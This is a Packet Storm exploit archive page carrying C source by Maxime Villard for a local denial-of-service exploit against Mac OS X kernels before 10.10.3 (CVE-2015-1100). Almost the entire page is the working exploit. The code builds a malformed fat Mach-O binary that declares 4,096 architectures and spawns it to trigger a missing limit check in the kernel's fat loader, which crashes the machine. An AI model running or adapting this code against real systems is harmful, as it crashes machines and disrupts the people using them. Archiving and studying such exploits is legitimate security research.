what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mac OS X Local Denial Of Service

Mac OS X Local Denial Of Service
Posted Apr 19, 2015
Authored by Maxime Villard

Local denial of service exploit for Mac OS X kernel versions prior to 10.10.3.

tags | exploit, denial of service, kernel, local
systems | apple, osx
advisories | CVE-2015-1100
SHA-256 | 8b8206b45dab552c0adf67970b3e4fcfdbb4fc7e2eb2c3e21b6e0df9e621e2d3
Download | Favorite | View

Mac OS X Local Denial Of Service

Change Mirror Download
/*
 * 2015, Maxime Villard, CVE-2015-1100
 * Local DoS caused by a missing limit check in the fat loader of the Mac OS X
 * Kernel.
 *
 *  $ gcc -o Mac-OS-X_Fat-DoS Mac-OS-X_Fat-DoS.c
 *  $ ./Mac-OS-X_Fat-DoS BINARY-NAME
 *
 * Obtained from: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.c
 * Analysis:      http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.txt
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <spawn.h>
#include <unistd.h>
#include <err.h>
#include <mach-o/fat.h>
#include <sys/stat.h>

#define MAXNUM (4096)
#define MAXNUM0 (OSSwapBigToHostInt32(MAXNUM))

void CraftBinary(char *name)
{
  struct fat_header fat_header;
  struct fat_arch *arches;
  size_t i;
  int fd;

  memset(&fat_header, 0, sizeof(fat_header));
  fat_header.magic = FAT_MAGIC;
  fat_header.nfat_arch = 4096;

  if ((arches = calloc(MAXNUM0, sizeof(struct fat_arch))) == NULL)
    err(-1, "calloc");
  for (i = 0; i < MAXNUM0; i++)
    arches[i].cputype = CPU_TYPE_I386;

  if ((fd = open(name, O_CREAT|O_RDWR)) == -1)
    err(-1, "open");
  if (write(fd, &fat_header, sizeof(fat_header)) == -1)
    err(-1, "write");
  if (write(fd, arches, sizeof(struct fat_arch) * MAXNUM0) == -1)
    err(-1, "write");
  if (fchmod(fd, S_IXUSR) == -1)
    err(-1, "fchmod");
  close(fd);
  free(arches);
}

void SpawnBinary(char *name)
{
  cpu_type_t cpus[] = { CPU_TYPE_HPPA, 0 };
  char *argv[] = { "Crazy Horse", NULL };
  char *envp[] = { NULL };
  posix_spawnattr_t attr;  
  size_t set = 0;
  int ret;

  if (posix_spawnattr_init(&attr) == -1)
    err(-1, "posix_spawnattr_init");
  if (posix_spawnattr_setbinpref_np(&attr, 2, cpus, &set) == -1)
    err(-1, "posix_spawnattr_setbinpref_np");
  fprintf(stderr, "----------- Goodbye! -----------\n");
  ret = posix_spawn(NULL, name, NULL, &attr, argv, envp);
  fprintf(stderr, "Hum, still alive. You are lucky today! ret = %d\n", ret);
}

int main(int argc, char *argv[])
{
  if (argc != 2) {
    printf("Usage: %s BINARY-NAME\n", argv[0]);
  } else {
    CraftBinary(argv[1]);
    SpawnBinary(argv[1]);
  }
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close